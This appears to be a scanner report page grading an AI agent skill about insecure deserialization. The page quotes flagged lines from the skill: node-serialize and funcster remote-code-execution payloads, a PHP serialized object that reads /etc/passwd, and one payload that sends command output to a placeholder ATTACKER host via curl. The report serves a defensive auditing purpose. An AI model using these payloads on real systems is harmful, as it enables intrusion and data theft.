deserialization-insecure

github.com/yaklang/hack-skills

Verdict: Proceed with caution

0 critical1 high9 medium

SCORE 55 / 100

$skillox install deserialization-insecureSoon

Why grade C?

score · 55 / 100

The current grade reflects 9 medium findings (6+ MEDs → C).

0 CRIT1 HIGH9 MED0 LOW

To reach a higher grade

B
Reach Btarget score 75
Resolve 4 of 9 MED (cap is 5).
A
Reach Atarget score 95
Resolve all 1 HIGH + 7 of 9 MED (cap is 2).

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Latest scan findings

Scan crawl-onhyumwutz5pdnwcgqnz2xmk · Thu, 28 May 2026 17:27:02 GMT · 3ms

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 181CWE-552

▾

179

180```text

181action=test&configuration=O:10:"PMA_Config":1:{s:6:"source";s:11:"/etc/passwd";}← sensitive path — credential-exfiltration vector

182```

183

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 93CWE-78

▾

91The vulnerability exists when `org.apache.commons.collections` (3.x) is on the classpath and the application calls `readObject()` on untrusted data.

93Key classes in the chain: `InvokerTransformer` → `ChainedTransformer` → `TransformedMap` → triggers `Runtime.exec()` during deserialization.← spawns a subprocess outside declared capabilities

95### Apache Shiro — rememberMe Deserialization

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 413CWE-78

▾

411

412 ```json

413 {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('COMMAND')}()"}← spawns a subprocess outside declared capabilities

414 ```

415

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 419CWE-78

▾

417

418 ```json

419 {"__js_function":"function(){return global.process.mainModule.require('child_process').execSync('id').toString()}"}← spawns a subprocess outside declared capabilities

420 ```

421

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 558CWE-78

▾

556// Payload uses _$$ND_FUNC$$_ marker + IIFE:

557

558var payload = '{"rce":"_$$ND_FUNC$$_function(){require(\'child_process\').exec(\'id\',function(error,stdout,stderr){console.log(stdout)});}()"}';← spawns a subprocess outside declared capabilities

559

560// The trailing () makes it an Immediately Invoked Function Expression

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 564CWE-78

▾

562

563// Full HTTP exploit (in cookie or body):

564{"username":"_$$ND_FUNC$$_function(){require('child_process').exec('curl http://ATTACKER/?x=$(id|base64)',function(e,o,s){});}()","email":"test@test.com"}← spawns a subprocess outside declared capabilities

565```

566

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 570CWE-78

▾

568```javascript

569// funcster deserializes functions via constructor.constructor pattern:

570{"__js_function":"function(){var net=this.constructor.constructor('return require')()('child_process');return net.execSync('id').toString();}"}← spawns a subprocess outside declared capabilities

571```

572

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 702CWE-78

▾

700// Payload: IIFE (Immediately Invoked Function Expression)

701// The _$$ND_FUNC$$_ prefix signals a serialized function

702{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('id',function(error,stdout,stderr){console.log(stdout)})}()"}← spawns a subprocess outside declared capabilities

703

704// Key: the () at the end causes immediate execution upon deserialization

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 711CWE-78

▾

709// Vulnerable: funcster.deepDeserialize(userInput)

710// Payload uses __js_function to inject via constructor chain:

711{"__js_function":"function(){var net=this.constructor.constructor('return this')().process.mainModule.require('child_process');return net.execSync('id').toString()}()"}← spawns a subprocess outside declared capabilities

712```

713

med

No capability manifest declared

The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.

rule: no-manifest

▾

View latest scan →

skillox.io/c/deserialization-insecure

Skill facts

Latest grade: C · 55
Total scans: 1
Latest version: —
Last scanned: 2026-05-28
Source: yaklang/hack-skills

AIBOM

What this skill accesses

No manifest

Declared (from capabilities)

No capabilities block in frontmatter — the skill doesn't state what it should access.

Observed (from scan findings)

Subprocess invocations

Key classes in the chain: `InvokerTransformer` → `ChainedTransformer` → `Transfo
var payload = '{"rce":"_$$ND_FUNC$$_function(){require(\'child_process\').exec(\
{"__js_function":"function(){return global.process.mainModule.require('child_pro
{"__js_function":"function(){var net=this.constructor.constructor('return requir
{"__js_function":"function(){var net=this.constructor.constructor('return this')
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('COMMAND')}()"}
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('id',function(erro
{"username":"_$$ND_FUNC$$_function(){require('child_process').exec('curl http://

Filesystem paths

/etc/passwd

AIBOM (Application Skills Bill of Materials) — see /docs/concepts/aibom for the format.

Version history

Only this scan

No other scans on record for this skill name. New scans appear here as the catalog re-crawls or creators request a re-scan.

Embed badge

Show this grade in your README.

Tracks the latest grade automatically. Updates within five minutes of every re-scan.

Markdown

[![SkillOx grade](https://api.skillox.io/badge/deserialization-insecure.svg)](https://skillox.io/c/deserialization-insecure)

Markdown · score

[![SkillOx score](https://api.skillox.io/badge/score/deserialization-insecure.svg)](https://skillox.io/c/deserialization-insecure)

HTML

<a href="https://skillox.io/c/deserialization-insecure"><img src="https://api.skillox.io/badge/deserialization-insecure.svg" alt="SkillOx grade"/></a>

reST

.. image:: https://api.skillox.io/badge/deserialization-insecure.svg
   :target: https://skillox.io/c/deserialization-insecure
   :alt: SkillOx grade

Coming soon

Creator verification badge, expert-review status, and Cosign-signed release attestation appear here as those layers ship. AIBOM + version history are live; the others follow once the creator portal completes its identity-proof + signing surface.